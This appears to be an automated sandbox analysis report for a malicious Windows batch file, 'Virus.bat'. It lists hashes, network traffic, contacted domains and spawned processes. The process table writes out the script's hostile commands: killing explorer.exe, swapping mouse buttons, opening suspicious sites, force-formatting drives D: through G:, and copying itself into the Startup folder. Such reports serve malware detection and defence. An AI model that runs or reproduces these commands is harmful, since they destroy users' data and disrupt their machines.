Field | Value
---|---
File name | Virus.bat
Full analysis | https://app.any.run/tasks/a81e45c8-7c33-4167-bf80-90f8688c63a0
Verdict | Malicious activity
Analysis date | May 21, 2022, 09:05:22
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators | 
MIME | text/plain
File info | ASCII text, with CRLF line terminators
MD5 | 94FD61CE02CADE547895C5C9D0A0BAC0
SHA1 | 313DED429034FBFC4567935BB91CC9A409066375
SHA256 | B3A13CDC76DEA743146238DE8432E0C8E5A8C8B7FB43793077AC92F8A1E1771B
SSDEEP | 12:IOfkVAvCestzPNHSuVM1t2GOestzF+r1Xjat2B8LSfDQg7BiZM7r9LpUOsyyzxMK:I4ABdtbwuVMtOdtBs1h1f37BOQjUOhyP

PID | CMD | Path | Indicators | Parent process | User | Company | Integrity Level | Description | Exit code | Version
---|---|---|---|---|---|---|---|---|---|---
2968 | C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\Virus.bat" " | C:\Windows\system32\cmd.exe | | Explorer.EXE | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | | 6.1.7601.17514 (win7sp1_rtm.101119-1850)
3044 | msg * (Muhahaha) | C:\Windows\system32\msg.exe | — | cmd.exe | admin | Microsoft Corporation | MEDIUM | Message Utility | 0 | 6.1.7600.16385 (win7_rtm.090713-1255)
1004 | taskkill /IM explorer.exe /f | C:\Windows\system32\taskkill.exe | — | cmd.exe | admin | Microsoft Corporation | MEDIUM | Terminates Processes | 0 | 6.1.7600.16385 (win7_rtm.090713-1255)
3948 | Rundll32 user32, SwapMouseButton | C:\Windows\system32\rundll32.exe | — | cmd.exe | admin | Microsoft Corporation | MEDIUM | Windows host process (Rundll32) | 0 | 6.1.7600.16385 (win7_rtm.090713-1255)
3516 | "C:\Program Files\Internet Explorer\iexplore.exe" http://www.evil-shit.de/ | C:\Program Files\Internet Explorer\iexplore.exe | | cmd.exe | admin | Microsoft Corporation | MEDIUM | Internet Explorer | | 11.00.9600.16428 (winblue_gdr.131013-1700)
4068 | "C:\Program Files\Internet Explorer\iexplore.exe" http://www.akk.li/pics/anne/jpg | C:\Program Files\Internet Explorer\iexplore.exe | | cmd.exe | admin | Microsoft Corporation | MEDIUM | Internet Explorer | | 11.00.9600.16428 (winblue_gdr.131013-1700)
2500 | format D:\ /F | C:\Windows\system32\format.com | — | cmd.exe | admin | Microsoft Corporation | MEDIUM | Disk Format Utility | 4 | 6.1.7600.16385 (win7_rtm.090713-1255)
912 | format E:\ /F | C:\Windows\system32\format.com | — | cmd.exe | admin | Microsoft Corporation | MEDIUM | Disk Format Utility | 4 | 6.1.7600.16385 (win7_rtm.090713-1255)
4084 | format F:\ /F | C:\Windows\system32\format.com | — | cmd.exe | admin | Microsoft Corporation | MEDIUM | Disk Format Utility | 4 | 6.1.7600.16385 (win7_rtm.090713-1255)
1988 | format G:\ /F | C:\Windows\system32\format.com | — | cmd.exe | admin | Microsoft Corporation | MEDIUM | Disk Format Utility | 4 | 6.1.7600.16385 (win7_rtm.090713-1255)

PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
4068 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63 | binary | 0C01AD1C07F53ED1800743912B04D81A | AFA786AAD42ACB61430DCC3801B6D2974511F809C60AC521C152B8F56BD66691
4068 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63 | der | AC4726FEE26B5D7F5BC731F03E7D7E34 | 990F044CAB696ED00BBC2CB11C62BA52EE6D61F33AAFD5F78CD35EA3513D9C01
188 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\646C991C2A28825F3CC56E0A1D1E3FA9 | der | 3523BFA7B3ACACA361AC9814166709AD | CE82F93FDB091E30497236D7F04BB67F7008E8E4133D2A8445B531C16D13AA67
188 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_72BF6A27377E65244ED5348D2E81C743 | der | 0D3D5D73E90D0F4349F5DD3436CF7552 | 46B9C4EEF9EB565AC4F655647A36462A84C31D7F8F6BA415B8DDF3B24AAEE9B3
188 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | binary | 3125F06B0098B6B1E22A7274222B4FA7 | 81500AE2010908B4122D44B628A7062F7849153F0A16D81EF186462E64C683A2
2968 | cmd.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Virus.bat | text | 94FD61CE02CADE547895C5C9D0A0BAC0 | B3A13CDC76DEA743146238DE8432E0C8E5A8C8B7FB43793077AC92F8A1E1771B
4068 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | der | FA526918A211E850A6078FB1D00B2045 | 396B94C667643AFA59D155EF4D812DA6F4D67DD50CEC97194E1CA3A1B3ECE3FE
188 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\5IWPIAR9\jpg[1].htm | html | CF4E529FEF1956DB6D128515AE7F0E63 | EFEDEDAFCFF7BADBEF47409136A30304DB6EE9B910D632D6C5D2FC2355B89816
188 | iexplore.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\DTMWROUK.txt | text | 862CFB5EB276780CE61F13960102190E | 0347A565468FF2C96DA89BA4A22805526971C13ADCF36B2FD56A2B154A339B5A
188 | iexplore.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\6QB1NSOR.txt | text | 9D69D3072D172891BD71F09E2CDC7CCB | D7ED0941E9CE6E06E8E8A1E12AEF65EECCF14265DCA20A6768ED3B19C0750915

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
---|---|---|---|---|---|---|---|---|---
2972 | iexplore.exe | GET | — | 62.143.36.236:80 | http://www.evil-shit.de/ | DE | — | — | unknown |
4068 | iexplore.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | US | der | 471 b | whitelisted |
188 | iexplore.exe | POST | 200 | 199.59.243.200:80 | http://www.akk.li/_fd | US | text | 2.30 Kb | malicious |
188 | iexplore.exe | GET | 200 | 199.59.243.200:80 | http://www.akk.li/pics/anne/jpg | US | html | 979 b | malicious |
4068 | iexplore.exe | GET | 200 | 199.59.243.200:80 | http://www.akk.li/favicon.ico | US | — | — | malicious |
188 | iexplore.exe | GET | 200 | 199.59.243.200:80 | http://www.akk.li/js/parking.2.88.1.js | US | html | 21.6 Kb | malicious |
188 | iexplore.exe | GET | 200 | 199.59.243.200:80 | http://www.akk.li/px.gif?ch=2&rn=7.611487305465162 | US | image | 42 b | malicious |
188 | iexplore.exe | GET | 200 | 172.217.16.131:80 | http://crl.pki.goog/gsr1/gsr1.crl | US | der | 1.61 Kb | whitelisted |
188 | iexplore.exe | GET | 200 | 142.250.181.227:80 | http://ocsp.pki.goog/gtsr1/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBQwkcLWD4LqGJ7bE7B1XZsEbmfwUAQU5K8rJnEaK0gnhS9SZizv8IkTcT4CDQIDvFNZazTHGPUBUGY%3D | US | der | 724 b | whitelisted |
4068 | iexplore.exe | GET | 200 | 93.184.220.29:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEA8Ull8gIGmZT9XHrHiJQeI%3D | US | der | 1.47 Kb | whitelisted |

PID | Process | IP | Domain | ASN | CN | Reputation
---|---|---|---|---|---|---
188 | iexplore.exe | 209.197.3.8:80 | ctldl.windowsupdate.com | Highwinds Network Group, Inc. | US | whitelisted |
2972 | iexplore.exe | 62.143.36.236:80 | www.evil-shit.de | Liberty Global Operations B.V. | DE | unknown |
188 | iexplore.exe | 142.250.186.36:443 | www.google.com | Google Inc. | US | whitelisted |
188 | iexplore.exe | 142.250.181.227:80 | ocsp.pki.goog | Google Inc. | US | whitelisted |
3516 | iexplore.exe | 13.107.21.200:443 | www.bing.com | Microsoft Corporation | US | whitelisted |
188 | iexplore.exe | 199.59.243.200:80 | www.akk.li | — | US | malicious |
4068 | iexplore.exe | 13.107.21.200:443 | www.bing.com | Microsoft Corporation | US | whitelisted |
188 | iexplore.exe | 142.250.186.130:443 | partner.googleadservices.com | Google Inc. | US | whitelisted |
4068 | iexplore.exe | 199.59.243.200:80 | www.akk.li | — | US | malicious |
4068 | iexplore.exe | 93.184.220.29:80 | ocsp.digicert.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |

Domain | IP | Reputation
---|---|---
www.evil-shit.de | | unknown
www.akk.li | | malicious
parking.bodiscdn.com | | whitelisted
fonts.googleapis.com | | whitelisted
www.google.com | | whitelisted
ctldl.windowsupdate.com | | whitelisted
ocsp.pki.goog | | whitelisted
api.bing.com | | whitelisted
www.bing.com | | whitelisted
ocsp.digicert.com | | whitelisted